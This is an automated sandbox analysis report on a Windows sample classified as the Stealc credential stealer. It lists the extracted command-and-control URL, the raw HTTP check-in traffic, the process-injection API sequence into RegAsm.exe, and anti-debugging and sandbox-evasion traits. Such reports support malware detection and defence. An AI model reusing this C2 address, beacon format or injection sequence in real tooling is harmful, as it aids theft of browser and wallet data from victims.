Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1508881
MD5:21617215ffe926fd76b00a8b2f3a28c7
SHA1:bb381ae78ca1c46db897add5b0da046515985692
SHA256:3b79a6f501554bc68d204d6b0b7ea80cc1619d9dd0ffebb6933edc3e9b8f29ac
Tags:exe
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 21617215FFE926FD76B00A8B2F3A28C7)
    • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    Process Memory Space: file.exe PID: 6820JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: RegAsm.exe PID: 7084JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: RegAsm.exe PID: 7084JoeSecurity_StealcYara detected StealcJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-10T20:11:02.328461+020020442431Malware Command and Control Activity Detected192.168.2.44973345.152.113.1080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://45.152.113.10/sAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpOAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpXAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpAvira URL Cloud: Label: malware
          Source: http://45.152.113.10Avira URL Cloud: Label: malware
          Source: http://45.152.113.10/92335b4816f77e90.phpgAvira URL Cloud: Label: malware
          Source: http://45.152.113.10/Avira URL Cloud: Label: malware
          Source: 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: .pdb8% source: file.exe

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49733 -> 45.152.113.10:80
          Source: Malware configuration extractorURLs: http://45.152.113.10/92335b4816f77e90.php
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 45.152.113.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 38 31 38 30 30 45 46 35 34 39 31 35 38 34 32 36 35 39 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="hwid"9081800EF5491584265921------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="build"cry------HIIIDAKKJJJKKECAKKJE--
          Source: Joe Sandbox ViewIP Address: 45.152.113.10 45.152.113.10
          Source: Joe Sandbox ViewASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK CODECCLOUD-AS-APCodecCloudHKLimitedHK
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: unknownTCP traffic detected without corresponding DNS query: 45.152.113.10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004062D0 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,3_2_004062D0
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.152.113.10Connection: Keep-AliveCache-Control: no-cache
          Source: unknownHTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 45.152.113.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 38 31 38 30 30 45 46 35 34 39 31 35 38 34 32 36 35 39 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 79 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="hwid"9081800EF5491584265921------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="build"cry------HIIIDAKKJJJKKECAKKJE--
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1706889627.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.php
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpO
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpX
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpg
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10/s
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10o
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.152.113.10qMW
          Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
          Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
          Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: file.exeString found in binary or memory: http://www.entrust.net/rpa03
          Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0

          System Summary

          barindex
          Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 192000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00404610 appears 316 times
          Source: file.exeStatic PE information: invalid certificate
          Source: file.exe, 00000000.00000000.1695560726.0000000000C74000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exeH vs file.exe
          Source: file.exe, 00000000.00000002.1698784775.000000000112E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameVQP.exeH vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@6/1@0/1
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: .pdb8% source: file.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A9F5 push ecx; ret 3_2_0041AA08
          Source: file.exeStatic PE information: section name: .text entropy: 7.99198291222824
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 4F60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6968Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401160 GetSystemInfo,3_2_00401160
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000083A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1706889627.000000000086B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: RegAsm.exe, 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404610 VirtualProtect ?,00000004,00000100,000000003_2_00404610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0041BA2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419160 mov eax, dword ptr fs:[00000030h]3_2_00419160
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,3_2_00404610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C8D9 SetUnhandledExceptionFilter,3_2_0041C8D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041ACFA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041A718
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 6820, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7084, type: MEMORYSTR
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F6241D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02F6241D
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 33C008Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004172F0 GetUserNameA,3_2_004172F0
          Source: file.exe, 00000000.00000002.1698784775.0000000001163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: file.exe, 00000000.00000002.1698784775.0000000001163000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7084, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.1706889627.000000000080A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7084, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          411
          Process Injection
          1
          Masquerading
          OS Credential Dumping31
          Security Software Discovery
          Remote ServicesData from Local System2
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Disable or Modify Tools
          LSASS Memory31
          Virtualization/Sandbox Evasion
          Remote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Account Discovery
          SMB/Windows Admin SharesData from Network Shared Drive12
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
          Process Injection
          NTDS1
          System Owner/User Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets12
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Software Packing
